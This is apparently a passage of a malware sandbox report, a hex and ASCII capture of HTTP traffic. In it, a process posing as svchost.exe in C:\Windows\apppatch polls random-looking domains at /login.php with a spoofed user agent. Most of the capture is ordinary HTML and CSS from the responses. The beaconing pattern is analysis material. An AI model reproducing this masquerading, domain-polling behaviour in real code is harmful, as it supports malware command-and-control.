                                                                                                                                                                                                                  Data Ascii: bkit-slider-thumb{border-color:#d10404;background-color:#d10404;box-shadow:none;}.site-footer a:hover + .post-count,.site-footer a:focus + .post-count{background:#d10404;border-color:#d10404;}.single .nav-links .nav-previous,.single .nav-links .nav-next{c
                                                                                                                                                                                                                  2024-11-11 17:50:49 UTC1369INData Raw: 20 2e 75 61 67 62 2d 69 66 62 2d 63 74 61 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 75 61 67 62 2d 62 75 74 74 6f 6e 73 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 62 62 2d 6d 6f 64 75 6c 65 2d 63 6f 6e 74 65 6e 74 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 70 6f 73 74 2d 67 72 69 64 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 69 6d 65 6c 69 6e 65 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e
                                                                                                                                                                                                                  Data Ascii: .uagb-ifb-cta a,.ast-single-post .entry-content .wp-block-uagb-buttons a,.ast-single-post .entry-content .uabb-module-content a,.ast-single-post .entry-content .uagb-post-grid a,.ast-single-post .entry-content .uagb-timeline a,.ast-single-post .entry-con
                                                                                                                                                                                                                  2024-11-11 17:50:49 UTC1369INData Raw: 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6a 73 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6d 69 6e 69 2d 63 61 72 74 2d 69 74 65 6d 20 61 2e 72 65 6d 6f 76 65 3a 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 7b 6f 75 74 6c 69 6e 65 2d 73 74 79 6c 65 3a 64 6f 74 74 65 64 3b 6f 75 74 6c 69 6e 65 2d 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 6f 75 74 6c 69 6e 65 2d 77 69 64 74 68 3a 74 68 69 6e 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 7d 69 6e 70 75 74 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 74 65 78 74 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 65 6d 61 69 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 75 72 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 70
                                                                                                                                                                                                                  Data Ascii: .woocommerce-js .woocommerce-mini-cart-item a.remove:focus-visible{outline-style:dotted;outline-color:inherit;outline-width:thin;border-color:transparent;}input:focus,input[type="text"]:focus,input[type="email"]:focus,input[type="url"]:focus,input[type="p


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  5192.168.2.65464775.2.71.1994431112C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  2024-11-11 17:50:49 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: puzylyp.com
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  2024-11-11 17:50:49 UTC352INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000
                                                                                                                                                                                                                  Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:49 GMT
                                                                                                                                                                                                                  Etag: "75apqkf46g19wv"
                                                                                                                                                                                                                  Server: Caddy
                                                                                                                                                                                                                  Server: awselb/2.0
                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                  X-Powered-By: Next.js
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  2024-11-11 17:50:49 UTC2372INData Raw: 38 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 53 65 74 3d 22 75 74 66 2d 38 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 35 77 65 6a 7a 65 37 64 32 74 6c 6a 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 76 31 2f 70 75 62 6c 69 63 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31
                                                                                                                                                                                                                  Data Ascii: 8000<!DOCTYPE html><html lang="en-US"><head><meta charSet="utf-8"/><link rel="apple-touch-icon" sizes="180x180" href="https://d15wejze7d2tlj.cloudfront.net/v1/public/apple-touch-icon.png"/><link rel="icon" type="image/png" sizes="32x32" href="https://d1
                                                                                                                                                                                                                  2024-11-11 17:50:49 UTC1724INData Raw: 65 78 74 2f 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 62 31 35 35 61 35 35 36 2d 37 32 37 37 64 32 30 35 62 33 61 39 36 64 64 31 2e 6a 73 22 20 64 65 66 65 72 3d 22 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 64 31 35 77 65 6a 7a 65 37 64 32 74 6c 6a 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 76 31 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 62 37 37 39 62 62 35 65 2d 65 33 34 61 63 36 66 32 62 33 32 65 65 39 62 31 2e 6a 73 22 20 64 65 66 65 72 3d 22 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 64 31 35 77 65 6a 7a 65 37 64 32 74 6c 6a 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 76 31 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f
                                                                                                                                                                                                                  Data Ascii: ext/static/chunks/b155a556-7277d205b3a96dd1.js" defer=""></script><script src="https://d15wejze7d2tlj.cloudfront.net/v1/_next/static/chunks/b779bb5e-e34ac6f2b32ee9b1.js" defer=""></script><script src="https://d15wejze7d2tlj.cloudfront.net/v1/_next/static/
                                                                                                                                                                                                                  2024-11-11 17:50:49 UTC4744INData Raw: 78 2d 63 6f 6c 20 67 61 70 2d 32 20 6d 62 2d 36 22 3e 3c 68 32 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 49 6e 74 65 72 20 74 65 78 74 2d 78 6c 20 66 6f 6e 74 2d 62 6f 6c 64 20 73 6d 3a 74 65 78 74 2d 32 78 6c 22 3e 49 6e 71 75 69 72 65 20 74 6f 64 61 79 20 74 6f 20 73 65 63 75 72 65 20 74 68 69 73 20 64 6f 6d 61 69 6e 3c 2f 68 32 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 49 6e 74 65 72 20 74 65 78 74 2d 73 6d 20 66 6f 6e 74 2d 6e 6f 72 6d 61 6c 20 73 6d 3a 74 65 78 74 2d 62 61 73 65 22 3e 50 6c 65 61 73 65 20 63 6f 6d 70 6c 65 74 65 20 74 68 65 20 66 6f 72 6d 20 62 65 6c 6f 77 20 61 6e 64 20 77 65 20 77 69 6c 6c 20 63 6f 6e 6e 65 63 74 20 79 6f 75 20 77 69 74 68 20 6f 6e 65 20 6f 66 20 6f 75 72 20 64 6f 6d 61 69 6e 20 65 78 70 65 72 74 73 2e
                                                                                                                                                                                                                  Data Ascii: x-col gap-2 mb-6"><h2 class="font-Inter text-xl font-bold sm:text-2xl">Inquire today to secure this domain</h2><span class="font-Inter text-sm font-normal sm:text-base">Please complete the form below and we will connect you with one of our domain experts.
                                                                                                                                                                                                                  2024-11-11 17:50:49 UTC5930INData Raw: 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 44 45 22 3e 44 45 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 34 39 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 50 45 22 3e 50 45 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 35 31 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 4d 58 22 3e 4d 58 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 35 32 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 43 55 22 3e 43 55 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 35 33 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e
                                                                                                                                                                                                                  Data Ascii: -- -->)</option><option value="DE">DE... --> (+... -->49... -->)</option><option value="PE">PE... --> (+... -->51... -->)</option><option value="MX">MX... --> (+... -->52... -->)</option><option value="CU">CU... --> (+... -->53... -->)</option
                                                                                                                                                                                                                  2024-11-11 17:50:49 UTC7116INData Raw: 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 36 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 43 59 22 3e 43 59 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 37 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 41 58 22 3e 41 58 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 38 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 46 49 22 3e 46 49 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 38 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 42 47 22 3e 42 47 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20
                                                                                                                                                                                                                  Data Ascii: --> (+... -->356... -->)</option><option value="CY">CY... --> (+... -->357... -->)</option><option value="AX">AX... --> (+... -->358... -->)</option><option value="FI">FI... --> (+... -->358... -->)</option><option value="BG">BG... --> (+...
                                                                                                                                                                                                                  2024-11-11 17:50:49 UTC8302INData Raw: 69 63 65 2d 72 65 71 75 65 73 74 2d 66 6f 72 6d 2d 69 64 22 20 74 69 74 6c 65 3d 22 47 65 74 20 70 72 69 63 65 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 47 65 74 20 70 72 69 63 65 22 20 6c 61 62 65 6c 3d 22 47 65 74 20 70 72 69 63 65 22 20 65 6e 64 49 63 6f 6e 3d 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 6c 65 78 20 6a 75 73 74 69 66 79 2d 63 65 6e 74 65 72 20 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 67 61 70 2d 31 2e 35 20 6d 78 2d 61 75 74 6f 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6c 65 78 20 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 67 61 70 2d 32 22 3e 47 65 74 20 70 72 69 63 65 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20
                                                                                                                                                                                                                  Data Ascii: ice-request-form-id" title="Get price" aria-label="Get price" label="Get price" endIcon="[object Object]"><span class="flex justify-center items-center gap-1.5 mx-auto"><div class="flex items-center gap-2">Get price<svg xmlns="http://www.w3.org/2000/svg"
                                                                                                                                                                                                                  2024-11-11 17:50:49 UTC2586INData Raw: 30 2e 33 76 2e 30 36 37 68 2d 2e 31 33 36 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 37 56 2e 37 36 48 39 2e 39 36 76 2e 30 36 38 68 2d 2e 31 33 36 76 2e 30 36 37 68 2d 2e 30 36 38 76 2e 30 36 38 48 39 2e 36 39 76 2e 30 36 38 48 39 2e 36 32 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 31 33 35 76 2e 30 36 37 48 39 2e 33 35 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 37 48 39 2e 30 38 76 2e 30 36 38 48 39 2e 30 31 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 37 76 2e 30 36 37 48 38 2e 37 34 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 37 48 38
                                                                                                                                                                                                                  Data Ascii: 0.3v.067h-.136v.068h-.068v.068h-.067V.76H9.96v.068h-.136v.067h-.068v.068H9.69v.068H9.62v.068h-.068v.068h-.135v.067H9.35v.068h-.068v.068h-.068v.068h-.068v.067H9.08v.068H9.01v.068h-.068v.068h-.068v.068h-.067v.067H8.74v.068h-.068v.068h-.068v.068h-.068v.067H8
                                                                                                                                                                                                                  2024-11-11 17:50:49 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                                  2024-11-11 17:50:49 UTC4096INData Raw: 36 38 38 31 0d 0a 65 6e 74 43 6f 6c 6f 72 22 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 32 39 2e 36 37 20 34 2e 34 37 34 68 2d 33 2e 39 34 36 76 31 31 2e 32 38 37 68 33 2e 39 34 35 63 33 2e 36 30 36 20 30 20 35 2e 39 35 2d 32 2e 32 31 35 20 35 2e 39 35 2d 35 2e 36 32 37 20 30 2d 33 2e 34 32 39 2d 32 2e 33 34 34 2d 35 2e 36 36 2d 35 2e 39 35 2d 35 2e 36 36 6d 2d 31 2e 36 38 33 20 39 2e 33 36 32 56 36 2e 33 38 32 68 31 2e 36 30 31 63 32 2e 33 37 38 20 30 20 33 2e 37 32 20 31 2e 34 30 37 20 33 2e 37 32 20 33 2e 37 35 32 73 2d 31 2e 33 34 32 20 33 2e 37 30 32 2d 33 2e 37 32 20 33 2e 37 30 32 7a 6d 31 37 2e 39 38 32 2d 32 2e 35 35 34 63 30 2d 32 2e 38 33 2d 32 2e 30 32 32 2d 34 2e 36 32 35 2d 34 2e 36 30 39 2d 34 2e 36 32 35 73
                                                                                                                                                                                                                  Data Ascii: 6881entColor" fill-rule="evenodd" d="M29.67 4.474h-3.946v11.287h3.945c3.606 0 5.95-2.215 5.95-5.627 0-3.429-2.344-5.66-5.95-5.66m-1.683 9.362V6.382h1.601c2.378 0 3.72 1.407 3.72 3.752s-1.342 3.702-3.72 3.702zm17.982-2.554c0-2.83-2.022-4.625-4.609-4.625s
                                                                                                                                                                                                                  2024-11-11 17:50:49 UTC13046INData Raw: 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 31 33 35 76 2d 2e 30 36 38 68 2d 2e 31 33 36 76 2d 2e 30 36 38 68 2d 2e 31 33 36 76 2d 2e 30 36 37 68 2d 2e 30 36 37 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 37 68 2d 2e 30 36 37 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 31 33 36 76 2d 2e 31 33 35 68 2d 2e 30 36 37 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 31 33 35 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 37 76 2d 2e 31 33 36 68 2d 2e 30 36 38 76 2d 2e 30 36 37 68 2d 2e 30 36 38 76 2d 2e 31 33 36 68 2d 2e 30 36 38 76 2d 2e 31 33 36
                                                                                                                                                                                                                  Data Ascii: 068h-.068v-.068h-.135v-.068h-.136v-.068h-.136v-.067h-.067v-.068h-.068v-.068h-.068v-.068h-.068v-.067h-.067v-.068h-.068v-.068h-.068v-.068h-.136v-.135h-.067v-.068h-.068v-.068h-.068v-.135h-.068v-.068h-.068v-.068h-.067v-.136h-.068v-.067h-.068v-.136h-.068v-.136


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  6192.168.2.654664188.114.96.34431112C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  2024-11-11 17:50:50 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: qegyhig.com
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  2024-11-11 17:50:51 UTC953INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:51 GMT
                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  vary: Accept-Encoding
                                                                                                                                                                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                  link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MYr8LF0YWpKwE%2FeGgprbyoxD3mDw%2FFuiiBCLXrs092U9A%2FGelKYQNWQBm0fQkPz8ck1%2B7o7Qg2%2BuzcuNa5NagmuRU9DeRnWQQ8ACGqyOCyIUvfMyaOhi49TP%2BtD1Fw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                  CF-RAY: 8e10207ffc1f0cc2-EWR
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1284&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=881&delivery_rate=2028011&cwnd=249&unsent_bytes=0&cid=942c420829deedf4&ts=853&x=0"
                                                                                                                                                                                                                  2024-11-11 17:50:51 UTC416INData Raw: 37 63 61 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 20 3c 73 74 79 6c 65 3e 0d 0a 23 77 70 61 64 6d 69 6e 62 61 72 20 23 77 70 2d 61 64 6d 69 6e 2d 62 61 72 2d 77 63 63 70 5f 66 72 65 65 5f 74 6f 70 5f 62 75 74 74 6f 6e 20 2e
                                                                                                                                                                                                                  Data Ascii: 7ca4<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <style>#wpadminbar #wp-admin-bar-wccp_free_top_button .
                                                                                                                                                                                                                  2024-11-11 17:50:51 UTC1369INData Raw: 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 31 2e 33 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20
                                                                                                                                                                                                                  Data Ascii: </style><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v21.3 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found -</title><meta property="og:locale" content="en_US" /><meta
                                                                                                                                                                                                                  2024-11-11 17:50:51 UTC1369INData Raw: 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 7d 3b 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e
                                                                                                                                                                                                                  Data Ascii: nction c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.can
                                                                                                                                                                                                                  2024-11-11 17:50:51 UTC1369INData Raw: 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f 3d 22 77 70 45 6d 6f 6a 69 53 65 74 74 69 6e 67 73 53 75 70 70 6f 72 74 73 22 2c 73 3d 5b 22 66 6c 61 67 22 2c 22 65 6d 6f 6a 69 22 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 3d 7b 65 76 65 72 79 74 68 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3a 21 30 7d 2c 65 3d 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 4a 53 4f
                                                                                                                                                                                                                  Data Ascii: ined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSO
                                                                                                                                                                                                                  2024-11-11 17:50:51 UTC1369INData Raw: 29 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 3f 74 28 65 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 29 3a 65 2e 77 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 61 73 74 72 61 2d 74 68 65 6d 65 2d 63 73 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 71 65 67 79 68 69 67 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 61 73 74 72 61 2f 61 73 73 65 74 73 2f 63 73 73 2f 6d 69 6e 69 66 69
                                                                                                                                                                                                                  Data Ascii: ).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);</script><link rel='stylesheet' id='astra-theme-css-css' href='https://qegyhig.com/wp-content/themes/astra/assets/css/minifi
